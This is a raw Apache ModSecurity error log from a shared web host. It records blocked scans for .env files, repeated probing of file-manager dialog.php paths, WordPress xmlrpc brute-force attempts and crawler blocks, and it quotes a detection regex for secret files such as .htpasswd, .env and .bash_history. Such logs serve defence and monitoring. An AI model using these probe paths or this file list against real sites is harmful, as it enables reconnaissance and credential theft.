[Tue May 26 14:41:03.102984 2026] [security2:error] [pid 636820:tid 637029] [client 195.178.110.34:39696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVjp6_r6oOphPch7B92FQAAAE8"]
[Tue May 26 14:41:03.260664 2026] [security2:error] [pid 636820:tid 637066] [client 195.178.110.34:39696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVjp6_r6oOphPch7B92FgAAAHQ"]
[Tue May 26 14:41:03.391718 2026] [security2:error] [pid 636820:tid 637033] [client 108.136.162.67:64179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/vendor/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjp6_r6oOphPch7B92FwAAAFM"]
[Tue May 26 14:41:03.926780 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjp6_r6oOphPch7B92GgAAAHU"]
[Tue May 26 14:41:04.208198 2026] [security2:error] [pid 636820:tid 636977] [client 108.136.162.67:64339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/vendor/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjqK_r6oOphPch7B92KAAAABs"]
[Tue May 26 14:41:05.007204 2026] [security2:error] [pid 636820:tid 637011] [client 108.136.162.67:64502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjqa_r6oOphPch7B92OAAAAD0"]
[Tue May 26 14:41:06.488802 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjqq_r6oOphPch7B92WAAAADE"]
[Tue May 26 14:41:06.854930 2026] [security2:error] [pid 636820:tid 636977] [client 108.136.162.67:64654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjqq_r6oOphPch7B92YwAAABs"]
[Tue May 26 14:41:07.178792 2026] [security2:error] [pid 636820:tid 636964] [client 202.141.83.254:19933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjq6_r6oOphPch7B92agAAAA4"]
[Tue May 26 14:41:07.178923 2026] [security2:error] [pid 636820:tid 636964] [client 202.141.83.254:19933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjq6_r6oOphPch7B92agAAAA4"]
[Tue May 26 14:41:07.683183 2026] [security2:error] [pid 636820:tid 636971] [client 108.136.162.67:64915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backend/assets/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjq6_r6oOphPch7B92ewAAABU"]
[Tue May 26 14:41:08.523868 2026] [security2:error] [pid 636820:tid 636978] [client 108.136.162.67:65025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/resources/assets/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjrK_r6oOphPch7B92kAAAABw"]
[Tue May 26 14:41:08.977582 2026] [security2:error] [pid 636820:tid 636979] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjrK_r6oOphPch7B92kwAAAB0"]
[Tue May 26 14:41:09.349818 2026] [security2:error] [pid 636820:tid 636986] [client 108.136.162.67:65139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/static/filemanager/dialog.php"] [unique_id "ahVjra_r6oOphPch7B92qQAAACQ"]
[Tue May 26 14:41:10.167920 2026] [security2:error] [pid 636820:tid 637075] [client 108.136.162.67:65225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/uploads/filemanager/dialog.php"] [unique_id "ahVjrq_r6oOphPch7B92wgAAAH0"]
[Tue May 26 14:41:10.516352 2026] [security2:error] [pid 636820:tid 637046] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjrq_r6oOphPch7B92vwAAAGA"]
[Tue May 26 14:41:10.781279 2026] [security2:error] [pid 636820:tid 637025] [client 195.178.110.34:57970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVjrq_r6oOphPch7B922gAAAEs"]
[Tue May 26 14:41:10.953727 2026] [security2:error] [pid 636820:tid 636966] [client 195.178.110.34:57970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahVjrq_r6oOphPch7B924gAAABA"]
[Tue May 26 14:41:10.990424 2026] [security2:error] [pid 636820:tid 636996] [client 108.136.162.67:65304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/media/filemanager/dialog.php"] [unique_id "ahVjrq_r6oOphPch7B925AAAAC4"]
[Tue May 26 14:41:11.162019 2026] [security2:error] [pid 636820:tid 637053] [client 195.178.110.34:57970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahVjr6_r6oOphPch7B925QAAAGc"]
[Tue May 26 14:41:11.815247 2026] [security2:error] [pid 636820:tid 636967] [client 108.136.162.67:65384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/files/filemanager/dialog.php"] [unique_id "ahVjr6_r6oOphPch7B928gAAABE"]
[Tue May 26 14:41:12.236268 2026] [security2:error] [pid 636820:tid 637065] [client 85.208.96.210:38620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVjsK_r6oOphPch7B93BwAAAHM"]
[Tue May 26 14:41:12.236429 2026] [security2:error] [pid 636820:tid 637065] [client 85.208.96.210:38620] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVjsK_r6oOphPch7B93BwAAAHM"]
[Tue May 26 14:41:12.604818 2026] [security2:error] [pid 636820:tid 637022] [client 108.136.162.67:65493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/content/filemanager/dialog.php"] [unique_id "ahVjsK_r6oOphPch7B93GwAAAEg"]
[Tue May 26 14:41:12.782149 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjsK_r6oOphPch7B93DgAAAHU"]
[Tue May 26 14:41:13.398471 2026] [security2:error] [pid 636820:tid 636967] [client 108.136.162.67:49240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/panel/assets/filemanager/dialog.php"] [unique_id "ahVjsa_r6oOphPch7B93NgAAABE"]
[Tue May 26 14:41:14.179684 2026] [security2:error] [pid 636820:tid 637076] [client 108.136.162.67:49386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/dashboard/assets/filemanager/dialog.php"] [unique_id "ahVjsq_r6oOphPch7B93SwAAAH4"]
[Tue May 26 14:41:14.695089 2026] [security2:error] [pid 636820:tid 637013] [client 74.7.228.54:55836] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "traderscafe.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVjsq_r6oOphPch7B93ZgAAP3c"]
[Tue May 26 14:41:14.737069 2026] [security2:error] [pid 636820:tid 637057] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjsq_r6oOphPch7B93UwAAAGs"]
[Tue May 26 14:41:14.981486 2026] [security2:error] [pid 636820:tid 636995] [client 108.136.162.67:49502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/manage/filemanager/dialog.php"] [unique_id "ahVjsq_r6oOphPch7B93agAAAC0"]
[Tue May 26 14:41:15.783319 2026] [security2:error] [pid 636820:tid 637019] [client 108.136.162.67:49625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/lib/filemanager/dialog.php"] [unique_id "ahVjs6_r6oOphPch7B93hgAAAEU"]
[Tue May 26 14:41:16.558643 2026] [core:crit] [pid 636820:tid 637038] (13)Permission denied: [client 40.77.167.17:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:16.604887 2026] [security2:error] [pid 636820:tid 637052] [client 108.136.162.67:49753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/libraries/filemanager/dialog.php"] [unique_id "ahVjtK_r6oOphPch7B93oQAAAGY"]
[Tue May 26 14:41:16.931258 2026] [security2:error] [pid 636820:tid 637004] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjtK_r6oOphPch7B93nAAAADY"]
[Tue May 26 14:41:17.435675 2026] [security2:error] [pid 636820:tid 637063] [client 108.136.162.67:49873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/includes/filemanager/dialog.php"] [unique_id "ahVjta_r6oOphPch7B93vgAAAHE"]
[Tue May 26 14:41:17.477356 2026] [security2:error] [pid 636820:tid 636978] [client 66.249.64.168:61142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVjs6_r6oOphPch7B93cgAAABw"], referer: https://doyecpa.com/prizes/13148824%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 14:41:17.633344 2026] [security2:error] [pid 636820:tid 637032] [client 202.141.83.254:53877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjta_r6oOphPch7B93wQAAAFI"]
[Tue May 26 14:41:17.633467 2026] [security2:error] [pid 636820:tid 637032] [client 202.141.83.254:53877] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjta_r6oOphPch7B93wQAAAFI"]
[Tue May 26 14:41:17.634375 2026] [security2:error] [pid 636820:tid 637022] [client 62.72.51.46:41762] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "businessapac.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVjta_r6oOphPch7B93wAAAAEg"]
[Tue May 26 14:41:18.251993 2026] [security2:error] [pid 636820:tid 637017] [client 108.136.162.67:50004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/storage/filemanager/dialog.php"] [unique_id "ahVjtq_r6oOphPch7B93zAAAAEM"]
[Tue May 26 14:41:18.902381 2026] [security2:error] [pid 636820:tid 637074] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjtq_r6oOphPch7B93zwAAAHw"]
[Tue May 26 14:41:19.035454 2026] [security2:error] [pid 636820:tid 637011] [client 108.136.162.67:50141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/assets/responsive-filemanager/filemanager/dialog.php"] [unique_id "ahVjt6_r6oOphPch7B932wAAAD0"]
[Tue May 26 14:41:19.847829 2026] [security2:error] [pid 636820:tid 636994] [client 108.136.162.67:50270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/application/third_party/filemanager/dialog.php"] [unique_id "ahVjt6_r6oOphPch7B938wAAACw"]
[Tue May 26 14:41:20.641262 2026] [security2:error] [pid 636820:tid 637024] [client 104.28.119.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVjtq_r6oOphPch7B932gAAAEo"]
[Tue May 26 14:41:20.927673 2026] [security2:error] [pid 636820:tid 637041] [client 108.136.162.67:50422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/administrator/components/com_jce/editor/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahVjuK_r6oOphPch7B94FQAAAFs"]
[Tue May 26 14:41:21.076810 2026] [security2:error] [pid 636820:tid 636951] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjuK_r6oOphPch7B94FAAAAAE"]
[Tue May 26 14:41:21.227851 2026] [core:crit] [pid 636820:tid 636984] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:21.552967 2026] [core:crit] [pid 636820:tid 637077] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:21.747657 2026] [security2:error] [pid 636820:tid 637062] [client 108.136.162.67:50671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/fm/dialog.php"] [unique_id "ahVjua_r6oOphPch7B94PgAAAHA"]
[Tue May 26 14:41:21.876949 2026] [core:crit] [pid 636820:tid 637075] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:22.361265 2026] [core:error] [pid 636820:tid 637014] [client 95.108.213.127:45544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:41:22.361288 2026] [core:error] [pid 636820:tid 637014] [client 95.108.213.127:45544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:41:22.398207 2026] [security2:error] [pid 636820:tid 637041] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjua_r6oOphPch7B94TAAAAFs"]
[Tue May 26 14:41:22.558248 2026] [security2:error] [pid 636820:tid 636981] [client 108.136.162.67:50878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/file-manager/dialog.php"] [unique_id "ahVjuq_r6oOphPch7B94agAAAB8"]
[Tue May 26 14:41:23.365065 2026] [security2:error] [pid 636820:tid 637039] [client 108.136.162.67:51088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/old/filemanager/dialog.php"] [unique_id "ahVju6_r6oOphPch7B94gQAAAFk"]
[Tue May 26 14:41:24.149661 2026] [security2:error] [pid 636820:tid 636982] [client 108.136.162.67:51287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backup/filemanager/dialog.php"] [unique_id "ahVjvK_r6oOphPch7B94ngAAACA"]
[Tue May 26 14:41:24.928431 2026] [security2:error] [pid 636820:tid 637062] [client 108.136.162.67:51500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahVjvK_r6oOphPch7B94wgAAAHA"]
[Tue May 26 14:41:25.211431 2026] [security2:error] [pid 636820:tid 637059] [client 216.244.66.241:50072] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/Map/JP/newmaps.html"] [unique_id "ahVjva_r6oOphPch7B94zwAAAG0"]
[Tue May 26 14:41:25.211570 2026] [security2:error] [pid 636820:tid 637059] [client 216.244.66.241:50072] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/Map/JP/newmaps.html"] [unique_id "ahVjva_r6oOphPch7B94zwAAAG0"]
